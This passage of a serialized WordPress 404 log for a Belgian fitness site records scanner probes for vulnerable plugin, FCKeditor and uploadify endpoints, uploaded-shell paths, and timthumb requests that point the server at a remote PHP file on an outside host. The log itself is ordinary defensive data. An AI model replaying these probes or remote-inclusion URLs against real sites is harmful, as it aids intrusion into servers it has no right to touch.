Firefox/34.0\";}s:13:\"last_hit_time\";i:1488392735;}s:43:\"http://www.crosstrainingcenter.be/contact/(\";a:5:{s:9:\"hit_count\";i:17;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:42:\"http://www.crosstrainingcenter.be/contact/\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1462464184;}s:81:\"http://www.crosstrainingcenter.be/contact/this.options[this.selectedIndex].value;\";a:5:{s:9:\"hit_count\";i:17;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:43:\"http://www.crosstrainingcenter.be/contact/(\";i:1;s:45:\"http://www.crosstrainingcenter.be/contact/url\";}s:11:\"user_agents\";a:1:{i:0;s:8:\"PHPCrawl\";}s:13:\"last_hit_time\";i:1462464185;}s:99:\"http://www.crosstrainingcenter.be/fckeditor/editor/filemanager/browser/default/connectors/test.html\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:99:\"http://www.crosstrainingcenter.be/fckeditor/editor/filemanager/browser/default/connectors/test.html\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104739;}s:105:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:105:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/browser/default/connectors/test.html\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104750;}s:89:\"http://www.crosstrainingcenter.be/editor/filemanager/browser/default/connectors/test.html\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:89:\"http://www.crosstrainingcenter.be/editor/filemanager/browser/default/connectors/test.html\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104755;}s:85:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/upload/test.html\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:85:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/upload/test.html\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104792;}s:89:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/connectors/test.html\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:89:\"http://www.crosstrainingcenter.be/admin/fckeditor/editor/filemanager/connectors/test.html\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104793;}s:69:\"http://www.crosstrainingcenter.be/fckeditor/_samples/asp/sample01.asp\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:69:\"http://www.crosstrainingcenter.be/fckeditor/_samples/asp/sample01.asp\";}s:11:\"user_agents\";a:1:{i:0;s:75:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\";}s:13:\"last_hit_time\";i:1404104795;}s:61:\"http://www.crosstrainingcenter.be/.google-analytics.com/ga.js\";a:5:{s:9:\"hit_count\";i:6;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";i:1;s:22:\"http://m.facebook.com/\";}s:11:\"user_agents\";a:5:{i:0;s:164:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC)\";i:1;s:189:\"Mozilla/5.0 (Linux; Android 5.1; HUAWEI RIO-L01 Build/HuaweiRIO-L01) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/88.0.0.22.76;]\";i:2;s:178:\"Mozilla/5.0 (Linux; Android 4.4.2; GT-I9195 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/88.0.0.22.76;]\";i:3;s:183:\"Mozilla/5.0 (Linux; Android 5.0.2; 7044X Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/89.0.0.17.70;]\";i:4;s:172:\"Mozilla/5.0 (Linux; U; Android 4.2.2; fr-be; GT-I8200N Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 [FB_IAB/FB4A;FBAV/89.0.0.17.70;]\";}s:13:\"last_hit_time\";i:1471466279;}s:71:\"http://www.crosstrainingcenter.be/wp-content/plugins/wptouch/readme.txt\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:67:\"http://crosstrainingcenter.be/wp-content/plugins/wptouch/readme.txt\";}s:11:\"user_agents\";a:1:{i:0;s:77:\"Mozilla/5.0 (Windows NT 6.2; Win64; x64; rv:27.0) Gecko/20121011 Firefox/27.0\";}s:13:\"last_hit_time\";i:1408121818;}s:92:\"http://www.crosstrainingcenter.be/wp-content/uploads/wysija/themes/xutgvwwr/hauptgericht.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:92:\"http://www.crosstrainingcenter.be/wp-content/uploads/wysija/themes/xutgvwwr/hauptgericht.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1408489555;}s:120:\"http://www.crosstrainingcenter.be/wp-content/plugins/akismet/readme.txtwp-content/plugins/wp_optin_pro/media-uploads.php\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:120:\"http://www.crosstrainingcenter.be/wp-content/plugins/akismet/readme.txtwp-content/plugins/wp_optin_pro/media-uploads.php\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1409565626;}s:40:\"http://www.crosstrainingcenter.be/drupal\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:36:\"http://crosstrainingcenter.be/drupal\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1409666326;}s:38:\"http://www.crosstrainingcenter.be/blog\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:34:\"http://crosstrainingcenter.be/blog\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1466627058;}s:40:\"http://www.crosstrainingcenter.be/joomla\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:36:\"http://crosstrainingcenter.be/joomla\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1409666330;}s:43:\"http://www.crosstrainingcenter.be/wordpress\";a:5:{s:9:\"hit_count\";i:5;s:6:\"is_new\";b:1;s:8:\"referers\";a:4:{i:0;s:39:\"http://crosstrainingcenter.be/wordpress\";i:1;s:34:\"http://www.crosstrainingcenter.be/\";i:2;s:45:\"http://www.crossroadsatbigcreek.com/wordpress\";i:3;s:40:\"http://www.crossfitnorfolk.com/wordpress\";}s:11:\"user_agents\";a:4:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";i:1;s:129:\"Mozilla/4.0 (compatible  MSIE 6.0  Windows NT 5.1  SV1  .NET CLR 1.1.4322  InfoPath.2  .NET CLR 2.0.50727  .NET CLR 3.0.04506.30)\";i:2;s:57:\"Opera/9.62 (Windows NT 5.1  U  YB/3.5.1  ru) Presto/2.1.1\";i:3;s:85:\"Opera/9.80 (Windows NT 5.1  U  MRA 5.7 (build 03757)  ru) Presto/2.2.15 Version/10.10\";}s:13:\"last_hit_time\";i:1479907171;}s:36:\"http://www.crosstrainingcenter.be/wp\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:32:\"http://crosstrainingcenter.be/wp\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1409666340;}s:81:\"http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/1281178363.png\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:52:\"msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)\";}s:13:\"last_hit_time\";i:1413543849;}s:71:\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";}s:13:\"last_hit_time\";i:1416396358;}s:92:\"http://www.crosstrainingcenter.be/&q=Cross%20Training%20Center%20%28Namur%20-%20Limelette%29\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:34:\"http://www.crosstrainingcenter.be/\";}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\";}s:13:\"last_hit_time\";i:1412621960;}s:119:\"http://www.crosstrainingcenter.be/wp-content/plugins/akismet/readme.txtwp-content/plugins/gravityforms/css/browsers.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:119:\"http://www.crosstrainingcenter.be/wp-content/plugins/akismet/readme.txtwp-content/plugins/gravityforms/css/browsers.css\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1412976466;}s:82:\"http://www.crosstrainingcenter.be/wp-content/plugins/gravityforms/css/browsers.css\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:82:\"http://www.crosstrainingcenter.be/wp-content/plugins/gravityforms/css/browsers.css\";i:1;s:78:\"http://crosstrainingcenter.be/wp-content/plugins/gravityforms/css/browsers.css\";}s:11:\"user_agents\";a:2:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";i:1;s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20120101 Firefox/33.0\";}s:13:\"last_hit_time\";i:1424096283;}s:61:\"http://www.crosstrainingcenter.be/inc/uploadify/uploadify.swf\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:57:\"http://crosstrainingcenter.be/inc/uploadify/uploadify.swf\";i:1;s:61:\"http://www.crosstrainingcenter.be/inc/uploadify/uploadify.swf\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1426350268;}s:61:\"http://www.crosstrainingcenter.be/lib/uploadify/uploadify.swf\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:57:\"http://crosstrainingcenter.be/lib/uploadify/uploadify.swf\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1413332355;}s:60:\"http://www.crosstrainingcenter.be/js/uploadify/uploadify.swf\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:56:\"http://crosstrainingcenter.be/js/uploadify/uploadify.swf\";i:1;s:60:\"http://www.crosstrainingcenter.be/js/uploadify/uploadify.swf\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1482542096;}s:96:\"http://crosstrainingcenter.be/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:96:\"http://crosstrainingcenter.be/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1414120281;}s:92:\"http://crosstrainingcenter.be/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:92:\"http://crosstrainingcenter.be/wp-content/themes/deep-blue/megaframe/megapanel/inc/upload.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1414120340;}s:92:\"http://crosstrainingcenter.be/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:92:\"http://crosstrainingcenter.be/wp-content/plugins/1-flash-gallery/upload.php?action=uploadify\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1414120615;}s:92:\"http://crosstrainingcenter.be/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:92:\"http://crosstrainingcenter.be/wp-content/plugins/wp-mailinglist/vendors/uploadify/upload.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1414120634;}s:80:\"http://crosstrainingcenter.be/wp-content/uploads/wysija/themes/enrtzamp/exor.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:80:\"http://crosstrainingcenter.be/wp-content/uploads/wysija/themes/enrtzamp/exor.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1414120721;}s:124:\"http://www.crosstrainingcenter.be/wp-content/themes/figero/includes/thumb.php?src=http://wordpress.com.carizo.com.tr/tim.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";}s:13:\"last_hit_time\";i:1416144000;}s:126:\"http://www.crosstrainingcenter.be/wp-content/themes/figero/classes/timthumb.php?src=http://wordpress.com.carizo.com.tr/tim.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";}s:13:\"last_hit_time\";i:1416144002;}s:121:\"http://www.crosstrainingcenter.be/wp-content/themes/figero/themify/img.php?src=http://wordpress.com.carizo.com.tr/tim.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";}s:13:\"last_hit_time\";i:1416144003;}s:86:\"http://www.crosstrainingcenter.be/wp-content/plugins/doptg/libraries/php/uploadify.swf\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:46:\"http://www.crosstrainingcenter.be/hello-world/\";}s:11:\"user_agents\";a:1:{i:0;s:105:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\";}s:13:\"last_hit_time\";i:1416698945;}s:78:\"http://www.crosstrainingcenter.be/wp-content/plugins/revslider/release_log.txt\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:74:\"http://crosstrainingcenter.be/wp-content/plugins/revslider/release_log.txt\";}s:11:\"user_agents\";a:2:{i:0;s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0\";i:1;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\";}s:13:\"last_hit_time\";i:1438199672;}s:80:\"http://www.crosstrainingcenter.be/wp-content/plugins/download-manager/readme.txt\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:80:\"http://www.crosstrainingcenter.be/wp-content/plugins/download-manager/readme.txt\";i:1;s:76:\"http://crosstrainingcenter.be/wp-content/plugins/download-manager/readme.txt\";}s:11:\"user_agents\";a:2:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";i:1;s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0\";}s:13:\"last_hit_time\";i:1418930158;}s:80:\"http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/229136119.png\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";}s:13:\"last_hit_time\";i:1417716370;}s:81:\"http://www.crosstrainingcenter.be/wp-content/plugins/tweet-old-post/css/style.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:81:\"http://www.crosstrainingcenter.be/wp-content/plugins/tweet-old-post/css/style.css\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1417911711;}s:81:\"http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/1192236854.png\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";}s:13:\"last_hit_time\";i:1417992942;}s:81:\"http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/1847734720.png\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";}s:13:\"last_hit_time\";i:1418281468;}s:120:\"http://www.crosstrainingcenter.be/le-cross-training/+++++++++++++++++++++++++++++Result:+no+post+sending+forms+are+found\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:121:\"http://www.crosstrainingcenter.be/le-cross-training/+++++++++++++++++++++++++++++Result:+no+post+sending+forms+are+found;\";}s:11:\"user_agents\";a:2:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\";}s:13:\"last_hit_time\";i:1418999995;}s:95:\"http://www.crosstrainingcenter.be/wp-content/plugins/shortcodes-ultimate/assets/css/sunrise.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:95:\"http://www.crosstrainingcenter.be/wp-content/plugins/shortcodes-ultimate/assets/css/sunrise.css\";}s:11:\"user_agents\";a:1:{i:0;s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20120101 Firefox/33.0\";}s:13:\"last_hit_time\";i:1418853136;}s:57:\"http://www.crosstrainingcenter.be/uploadify/uploadify.swf\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:57:\"http://www.crosstrainingcenter.be/uploadify/uploadify.swf\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1418984322;}s:67:\"http://www.crosstrainingcenter.be/mailto:infocrosstrainingcenter.be\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:64:\"http://crosstrainingcenter.be/mailto:info@crosstrainingcenter.be\";}s:11:\"user_agents\";a:1:{i:0;s:19:\"Go 1.1 package http\";}s:13:\"last_hit_time\";i:1418985557;}s:76:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/readme.txt\";a:5:{s:9:\"hit_count\";i:18;s:6:\"is_new\";b:1;s:8:\"referers\";a:3:{i:0;s:72:\"http://crosstrainingcenter.be/wp-content/plugins/wp-symposium/readme.txt\";i:1;s:76:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/readme.txt\";i:2;s:30:\"http://crosstrainingcenter.be/\";}s:11:\"user_agents\";a:6:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\";i:1;s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\";i:2;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36\";i:3;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";i:4;s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8\";i:5;s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\";}s:13:\"last_hit_time\";i:1496224739;}s:82:\"http://crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:82:\"http://crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1419283301;}s:86:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:86:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1419304173;}s:104:\"http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/license.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:100:\"http://crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/license.php\";}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0\";}s:13:\"last_hit_time\";i:1419963696;}s:103:\"http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/__sprd.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:99:\"http://crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/__sprd.php\";}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0\";}s:13:\"last_hit_time\";i:1419963700;}s:75:\"http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/css/demo.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:71:\"http://crosstrainingcenter.be/wp-content/plugins/formcraft/css/demo.css\";}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0\";}s:13:\"last_hit_time\";i:1420078079;}s:77:\"http://www.crosstrainingcenter.be/wp-content/plugins/cforms2/cforms-admin.css\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:73:\"http://crosstrainingcenter.be/wp-content/plugins/cforms2/cforms-admin.css\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1420215072;}s:47:\"http://www.crosstrainingcenter.be/wp-update.php\";a:5:{s:9:\"hit_count\";i:14;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:47:\"http://www.crosstrainingcenter.be/wp-update.php\";i:1;s:43:\"http://crosstrainingcenter.be/wp-update.php\";}s:11:\"user_agents\";a:2:{i:0;s:59:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)\";i:1;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1437076245;}s:63:\"http://www.crosstrainingcenter.be/wp-content/plugins/cforms/js/\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:63:\"http://www.crosstrainingcenter.be/wp-content/plugins/cforms/js/\";}s:11:\"user_agents\";a:1:{i:0;s:59:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)\";}s:13:\"last_hit_time\";i:1420388491;}s:79:\"http://www.crosstrainingcenter.be/wp-content/plugins/cforms2/styling/cforms.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:75:\"http://crosstrainingcenter.be/wp-content/plugins/cforms2/styling/cforms.css\";}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0\";}s:13:\"last_hit_time\";i:1420450016;}s:91:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-easycart/inc/amfphp/administration/\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:91:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-easycart/inc/amfphp/administration/\";}s:11:\"user_agents\";a:1:{i:0;s:59:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 